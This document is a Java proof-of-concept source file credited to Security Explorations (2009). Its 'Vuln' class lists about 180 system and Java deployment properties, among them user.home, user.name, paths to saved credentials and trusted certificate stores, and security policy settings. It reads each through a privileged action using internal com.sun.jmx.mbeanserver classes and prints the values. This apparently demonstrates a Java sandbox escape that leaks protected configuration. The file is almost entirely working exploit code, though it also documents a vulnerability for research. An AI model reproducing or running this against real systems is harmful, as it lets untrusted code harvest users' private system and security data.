/*## (c) SECURITY EXPLORATIONS    2009 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.security.*;
import com.sun.jmx.mbeanserver.*;

public class Vuln {

  private static String props[]={
   "acl.read",
   "acl.read.default",
   "acl.write",
   "acl.write.default",
   "awt.toolkit",
   "browser",
   "browser.vendor",
   "browser.version",
   "file.encoding",
   "file.encoding.pkg",
   "file.separator",
   "file.separator.applet",
   "http.agent",
   "http.auth.serializeRequests",
   "https.protocols",
   "java.awt.graphicsenv",
   "java.awt.printerjob",
   "java.class.path",
   "java.class.version",
   "java.class.version.applet",
   "java.endorsed.dirs",
   "java.ext.dirs",
   "java.home",
   "java.io.tmpdir",
   "java.library.path",
   "java.protocol.handler.pkgs",
   "java.rmi.server.RMIClassLoaderSpi",
   "java.runtime.name",
   "java.runtime.version",
   "java.specification.name",
   "java.specification.vendor",
   "java.specification.version",
   "java.vendor",
   "java.vendor.applet",
   "java.vendor.url",
   "java.vendor.url.applet",
   "java.vendor.url.bug",
   "java.version",
   "java.version.applet",
   "java.vm.info",
   "java.vm.name",
   "java.vm.specification.name",
   "java.vm.specification.vendor",
   "java.vm.specification.version",
   "java.vm.vendor",
   "java.vm.version",
   "javaplugin.nodotversion",
   "javaplugin.version",
   "javaplugin.vm.options",
   "javawebstart.version",
   "line.separator",
   "line.separator.applet",
   "os.arch",
   "os.arch.applet",
   "os.name",
   "os.name.applet",
   "os.version",
   "os.version.applet",
   "package.restrict.access.com.sun.deploy",
   "package.restrict.access.netscape",
   "package.restrict.access.org.mozilla.jss",
   "package.restrict.access.sun",
   "package.restrict.definition.com.sun.deploy",
   "package.restrict.definition.java",
   "package.restrict.definition.netscape",
   "package.restrict.definition.org.mozilla.jss",
   "package.restrict.definition.sun",
   "path.separator",
   "path.separator.applet",
   "sun.arch.data.model",
   "sun.boot.class.path",
   "sun.boot.library.path",
   "sun.cpu.endian",
   "sun.cpu.isalist",
   "sun.desktop",
   "sun.io.unicode.encoding",
   "sun.java.launcher",
   "sun.jnu.encoding",
   "sun.management.compiler",
   "sun.net.client.defaultConnectTimeout",
   "sun.net.http.errorstream.enableBuffering",
   "sun.os.patch.level",
   "trustProxy",
   "user.country",
   "user.dir",
   "user.home",
   "user.language",
   "user.name",
   "user.timezone",
   "user.variant",
   "deployment.browser.path",
   "deployment.browser.vm.iexplorer",
   "deployment.browser.vm.mozilla",
   "deployment.cache.enabled",
   "deployment.cache.jarcompression",
   "deployment.cache.max.size",
   "deployment.capture.mime.types",
   "deployment.console.startup.mode",
   "deployment.control.panel.log",
   "deployment.javapi.cache.update",
   "deployment.javapi.lifecycle.exception",
   "deployment.javapi.log.filename",
   "deployment.javapi.runtime.type",
   "deployment.javapi.trace.filename",
   "deployment.javaws.associations",
   "deployment.javaws.autodownload",
   "deployment.javaws.cache.update",
   "deployment.javaws.home.jnlp.url",
   "deployment.javaws.installURL",
   "deployment.javaws.logFileName",
   "deployment.javaws.muffin.max",
   "deployment.javaws.shortcut",
   "deployment.javaws.splash.index",
   "deployment.javaws.ssv.enabled",
   "deployment.javaws.traceFileName",
   "deployment.javaws.uninstall.shortcut",
   "deployment.javaws.update.timeout",
   "deployment.javaws.viewer.bounds",
   "deployment.jpi.mode.new",
   "deployment.log",
   "deployment.max.output.file.size",
   "deployment.max.output.files",
   "deployment.mime.types.use.default",
   "deployment.proxy.bypass.local",
   "deployment.proxy.override.hosts",
   "deployment.proxy.same",
   "deployment.proxy.type",
   "deployment.repository.askdownloaddialog.show",
   "deployment.repository.enabled",
   "deployment.security.SSLv2Hello",
   "deployment.security.SSLv3",
   "deployment.security.TLSv1",
   "deployment.security.askgrantdialog.notinca",
   "deployment.security.askgrantdialog.show",
   "deployment.security.authenticator",
   "deployment.security.blacklist.check",
   "deployment.security.browser.keystore.use",
   "deployment.security.clientauth.keystore.auto",
   "deployment.security.expired.warning",
   "deployment.security.https.warning.show",
   "deployment.security.jsse.hostmismatch.warning",
   "deployment.security.notinca.warning",
   "deployment.security.password.cache",
   "deployment.security.pretrust.list",
   "deployment.security.sandbox.awtwarningwindow",
   "deployment.security.sandbox.jnlp.enhanced",
   "deployment.security.trusted.policy",
   "deployment.security.validation.crl",
   "deployment.security.validation.ocsp",
   "deployment.system.security.blacklist",
   "deployment.system.security.cacerts",
   "deployment.system.security.jssecacerts",
   "deployment.system.security.oldcacerts",
   "deployment.system.security.oldjssecacerts",
   "deployment.system.security.trusted.certs",
   "deployment.system.security.trusted.clientauthcerts",
   "deployment.system.security.trusted.jssecerts",
   "deployment.system.security.trusted.publishers",
   "deployment.system.tray.icon",
   "deployment.trace",
   "deployment.update.mime.types",
   "deployment.user.cachedir",
   "deployment.user.extdir",
   "deployment.user.logdir",
   "deployment.user.security.blacklist",
   "deployment.user.security.policy",
   "deployment.user.security.saved.credentials",
   "deployment.user.security.trusted.cacerts",
   "deployment.user.security.trusted.certs",
   "deployment.user.security.trusted.clientauthcerts",
   "deployment.user.security.trusted.jssecacerts",
   "deployment.user.security.trusted.jssecerts",
   "deployment.user.security.trusted.publishers",
   "deployment.user.tmp",
   "deployment.version",
   "java.quick.starter"
  };

  private static void print_property(String name) {
   GetPropertyAction action=new GetPropertyAction(name);
   String val=(String)AccessController.doPrivilegedWithCombiner(action);
   if (val!=null) System.out.println(name+" = "+val);
  }

  public static void run() {
   try {
    for(int i=0;i<props.length;i++) {
     print_property(props[i]);
    }
   } catch (Throwable e) {
    e.printStackTrace();
   }

  }
}
